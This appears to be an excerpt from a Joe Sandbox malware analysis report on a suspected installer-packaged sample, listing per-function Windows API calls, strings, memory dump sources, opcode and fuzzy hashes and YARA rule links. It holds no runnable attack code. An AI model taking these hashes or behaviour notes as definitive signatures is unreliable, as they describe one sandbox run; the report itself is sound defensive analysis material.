                                                                                                                                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1849352358-0
                                                                                                                                                                                                                    • Opcode ID: 09c23d4a4ca6f0b232d113dc6f4b45afdfe06e4b3b74d97eac453210c4480ab0
                                                                                                                                                                                                                    • Instruction ID: f6b005b132729ba5a1909f4a704d5e159ac18246d791616e3be01574202a0a4f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 09c23d4a4ca6f0b232d113dc6f4b45afdfe06e4b3b74d97eac453210c4480ab0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4EF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D419B38
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$Timeout
                                                                                                                                                                                                                    • String ID: !
                                                                                                                                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                    • Opcode ID: 7e3eeff1b63bcc2d517f183bf836ef2b026841584b0bf51ee9d38dd24623c36e
                                                                                                                                                                                                                    • Instruction ID: 9b2162bbfebbb1b7b3748198b6c02d748cac4cdb6124cb19748b2f92d1b33cd7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e3eeff1b63bcc2d517f183bf836ef2b026841584b0bf51ee9d38dd24623c36e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E219371948209AEEF059FB5DE4AABE7BB5EF84304F14443EF605B61D0D7B889409B18
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00404ADE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00404B88
                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                    • String ID: %u.%u%s%s
                                                                                                                                                                                                                    • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                    • Opcode ID: 667e92691d3a32f7dc764ef490f0f11e5b3d1f36831efa1286417e207b6162a7
                                                                                                                                                                                                                    • Instruction ID: 49dacc2217062e77d4dc452dcd456e10a33323318ced1260d8f84a7edb165714
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 667e92691d3a32f7dc764ef490f0f11e5b3d1f36831efa1286417e207b6162a7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D911C3736041283ADB00656D9C46F9E369C9B85334F254237FA25F21D1E979D82182E8
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00405B8F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040337C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77573420,004035D9,?,00000006,00000008,0000000A), ref: 00405B95
                                                                                                                                                                                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040337C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77573420,004035D9,?,00000006,00000008,0000000A), ref: 00405B9F
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,0040A014), ref: 00405BB1
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B8F
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                    • API String ID: 2659869361-3355392842
                                                                                                                                                                                                                    • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                                                                                                                    • Instruction ID: 9f579dd6f6e84daacee8b4087b975d8f345068127d43d06e1f6a06445f68851b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8D05E31101534AAC111BF448D04CDF72ACAE45344742007AF501B20A2C7B82D5186FE
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00402E79 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402EAA
                                                                                                                                                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2102729457-0
                                                                                                                                                                                                                    • Opcode ID: 5c4e852214d6767aab513baeadf18d74bcc02012da70e31d5af0b3f9b2778c41
                                                                                                                                                                                                                    • Instruction ID: ba23c68ca914eac1f4c080bcf69ea635dc5c4ffa9688b42209883b937cdf97fb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c4e852214d6767aab513baeadf18d74bcc02012da70e31d5af0b3f9b2778c41
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7FF03A30541630FBC6706B20FE0DA8B7B65FB44B02B42497AF002A19A4C7B849818ADC
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00406188 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,0042C228,00000000,?,?,Call,?,?,004063FC,80000002), ref: 004061CE
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,004063FC,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,0042C228), ref: 004061D9
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseQueryValue
                                                                                                                                                                                                                    • String ID: Call
                                                                                                                                                                                                                    • API String ID: 3356406503-1824292864
                                                                                                                                                                                                                    • Opcode ID: 39fcf064542560d24c6d229e41b3d785baee5d61bfb3b66db71ff6e5a1171cc9
                                                                                                                                                                                                                    • Instruction ID: dbe656cbcd6f76d760dfbfd9a3b1c67a2d3549b4381969b9bec3f5648691b042
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39fcf064542560d24c6d229e41b3d785baee5d61bfb3b66db71ff6e5a1171cc9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22017C72500209EADF218F51CD09EDB3BA8EB55364F01803AFD16A61A1D778D964EBA4
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004058A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 004058CC
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004058D9
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • Error launching installer, xrefs: 004058B6
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                    • String ID: Error launching installer
                                                                                                                                                                                                                    • API String ID: 3712363035-66219284
                                                                                                                                                                                                                    • Opcode ID: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                                                                                                                                                                                    • Instruction ID: eef1ad79794a30a774d0e472c728ed5028324d39c85b098150df6d3db2f5c38f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 93E092B5600209BFEB00AB64ED49F7BBBACEB04704F508565BD51F2290D778EC148A78
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00403915 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,77573420,004038ED,00403703,00000006,?,00000006,00000008,0000000A), ref: 0040392F
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00403936
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403927
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Free$GlobalLibrary
                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                    • API String ID: 1100898210-3355392842
                                                                                                                                                                                                                    • Opcode ID: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                                                                                                                                                                                    • Instruction ID: cd662c2fc9a96c5040b18d0515cf0ea54f7952519699f51ce209c07819915f51
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20E0C2335016209BC6215F04ED08B5E776CAF58B32F05447AF8807B26087B81C838FD8
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00405BDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe,C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BE1
                                                                                                                                                                                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe,C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BF1
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CharPrevlstrlen
                                                                                                                                                                                                                    • String ID: C:\Users\user\Desktop
                                                                                                                                                                                                                    • API String ID: 2709904686-3370423016
                                                                                                                                                                                                                    • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                                                                                                                                    • Instruction ID: aeb767edbde6605fb3f6e877d1e8e55744b908c0e0c9ef55a7edb7ad10a4fca3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9D05EB2414920DAC3126B04DC40D9F73ACEF11300B4A446AE440A61A1D7786C8186AD
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 6F2610E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 6F26116A
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6F2611C7
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6F2611D9
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 6F261203
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49589958063.000000006F261000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F260000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49589926339.000000006F260000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49589985935.000000006F264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49590017734.000000006F266000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_6f260000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Global$Free$Alloc
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1780285237-0
